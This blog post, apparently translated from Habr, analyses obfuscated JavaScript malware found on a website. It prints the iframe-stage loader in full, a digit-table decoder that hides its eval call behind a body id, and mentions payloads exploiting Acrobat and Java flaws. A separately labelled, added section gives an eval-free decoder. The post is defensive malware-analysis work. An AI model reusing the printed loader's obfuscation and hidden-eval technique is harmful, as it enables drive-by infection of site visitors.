
JavaScript malware identification

On one site, strange JavaScript code was found in the support section, and it was fairly clear that it was malicious: Avast issued a warning, and the browser console showed connections to several shady sites.

How the malicious code got onto the site is not that important (the suspected hole has already been closed), but before removing the code for good, I decided to see what it does.

So, there are three lines of obfuscated code; take, for example, the first one.
You can decode such scripts using various online services, but when I tried to decode further, I came across a wonderful program that lets you spend less time on it.

The decoded script is much clearer. Interestingly, the call to the remote site is made from the “document.onmousemove” event handler, so an automated scanner (bot), which never moves a mouse, most likely will not trigger this script.
All three scripts led to sites whose domains were registered through DyDNS, which makes tracing the person behind them impossible; we did not need that, but it would have been a nice bonus.

OK, now for the interesting part: what exactly does this script load from that site? It turns out to be yet another obfuscated JS file. We already know how to find a script's true purpose, and there is nothing interesting in this code: it loads an iframe, in which, I assumed, everything would be simple. However, the server's response surprised me a lot; it was very unclear what was in there. This one I decided to take apart by hand, because the magic program could not help.

The HTML was also interesting:
<body id="eval"> <input type="text" value="innerHTML" id="bOHYVBO5"> <div id="length" style="visibility:hidden"> 

and the scripts:
<script>
// EPPkAnzs is an alias for document
EPPkAnzs=document;
// wxdQzk0q = getElementById
EPPkAnzs.wxdQzk0q=function(shjZdTvV){return EPPkAnzs.getElementById(shjZdTvV);};
// Wul6s0M = getElementsByTagName (the method name is split with filler to evade string matching)
EPPkAnzs.Wul6s0M=function(shjZdTvV){return EPPkAnzs["getElementsB@@@@@@@@@@yTagName".replace("@@@@@@@@@@","")](shjZdTvV);};
// ZYpi6j9 = "length" (the id of the first div)
ZYpi6j9=EPPkAnzs.Wul6s0M("div")[0].id;
// SJHTBM = string concat, HALnMi = substr
function SJHTBM(Y7vWZr3R,YCYqLvHz){return Y7vWZr3R.concat(YCYqLvHz);}
HALnMi=function(Y7vWZr3R,YCYqLvHz,DiZpr){return Y7vWZr3R.substr(YCYqLvHz,DiZpr);};
// qo5mOv = innerHTML of the second div (the big block of digits)
qo5mOv=EPPkAnzs.Wul6s0M("div")[1][EPPkAnzs.wxdQzk0q("bOHYVBO5").value];
// vOm2xcMs = the character table the digit pairs index into
vOm2xcMs = "Da[-PREfb6)lIN%{c4 V&s>}yJ2?*8!=Yo0+9Zu7_dO$|\\'x<nUAG^]j;M31e/gCtHL5wvKh@\"#W,rpmSFi:zTqBQk(X";
wM16vq="";
lA8KxT38=qo5mOv[ZYpi6j9];
FBVE8K4W=0; i=0; gTjSM=[];
// split the digit string into two-character chunks
while(FBVE8K4W<lA8KxT38){ gTjSM[i] = HALnMi(qo5mOv,FBVE8K4W,2); FBVE8K4W=2+FBVE8K4W; i++; }
i=0;
// each chunk is an index into the table; collect the characters into wM16vq
while(i<gTjSM[ZYpi6j9]){ iidteUpd=HALnMi(vOm2xcMs,gTjSM[i],1); wM16vq=SJHTBM(wM16vq,iidteUpd); i++; }
</script>
<script>
// body id is "eval": this[...] resolves to window.eval, which runs the decoded string
if(EPPkAnzs.Wul6s0M("div")[0].id==="length")this[EPPkAnzs.Wul6s0M("body")[0].id](wM16vq);;
</script>


To begin with, I decided to simplify all this so as not to stare at a random jumble of letters. The first obvious step is to replace “EPPkAnzs” with “document” everywhere, then do the rest of the obvious things: “getElementsB@@@@@@@@@@yTagName”.replace(“@@@@@@@@@@”,“”) becomes getElementsByTagName, and so on. Then I began to simplify the function names and substitute in the known values.
The unreadable “qo5mOv=EPPkAnzs.Wul6s0M("div")[1][EPPkAnzs.wxdQzk0q("bOHYVBO5").value];” turned into the understandable “big_text=document.getElementsByTagName("div")[1]["innerHTML"];”
After these fairly simple manipulations, the cunning plotter's scheme became obvious: in a loop it walks over the big block of digits at the top, splits it into pairs, and for each pair takes the character at that position from the character string. Once everything was clear, I simply replaced the eval with output of the result and formatted it a little.
Looking through the script, I saw that it used Acrobat Reader and Java vulnerabilities.
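The decoding loop described above, reimplemented as a stand-alone, eval-free decoder so the payload can be read instead of run. This is an added example, not code from the original post; the character table is the vOm2xcMs string from the script, while the encoder helper and the encoded sample are constructed here from a harmless string.

```javascript
// Table copied from the script's vOm2xcMs variable: 92 characters, so every
// index fits in exactly two decimal digits, which is why the digit block is
// split into pairs.
const TABLE = "Da[-PREfb6)lIN%{c4 V&s>}yJ2?*8!=Yo0+9Zu7_dO$|\\'x<nUAG^]j;M31e/gCtHL5wvKh@\"#W,rpmSFi:zTqBQk(X";

// Decode a string of two-digit indices into the plain-text payload, mirroring
// the two while loops (substr(pos, 2), then table.substr(idx, 1)) but never
// passing the result to eval. Malformed input throws instead of silently
// decoding to table[0], which is what the original's NaN-to-0 coercion does.
function decodeTwoDigitTable(encoded, table = TABLE) {
  if (encoded.length % 2 !== 0) {
    throw new Error("encoded length must be even, got " + encoded.length);
  }
  let out = "";
  for (let pos = 0; pos < encoded.length; pos += 2) {
    const chunk = encoded.substr(pos, 2);
    if (!/^\d\d$/.test(chunk)) {
      throw new Error("non-numeric chunk '" + chunk + "' at offset " + pos);
    }
    const idx = Number(chunk);
    if (idx >= table.length) {
      throw new Error("index " + idx + " outside table at offset " + pos);
    }
    out += table.charAt(idx);
  }
  return out;
}

// Inverse of the decoder. Hypothetical helper used only to build the demo
// sample; the malicious page carries only the decoding half.
function encodeTwoDigitTable(plain, table = TABLE) {
  let out = "";
  for (const ch of plain) {
    const idx = table.indexOf(ch);
    if (idx < 0) throw new Error("character not in table: " + JSON.stringify(ch));
    out += String(idx).padStart(2, "0");
  }
  return out;
}

// Constructed sample: what the hidden <div> would hold if the payload were
// this harmless call instead of the exploit loader.
const SAMPLE_PLAIN = 'alert("decoded")';
const SAMPLE_ENCODED = encodeTwoDigitTable(SAMPLE_PLAIN);
console.log(SAMPLE_ENCODED);
console.log(decodeTwoDigitTable(SAMPLE_ENCODED));
```

To analyse a real sample, paste the digit string from the second div into decodeTwoDigitTable and read the output; nothing is executed.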

With that I calmed down and, with a clear conscience, deleted all references to the malware. Check popular plugins for security issues and update them promptly so you don't have to go on quests like this.

Source: https://habr.com/ru/post/139453/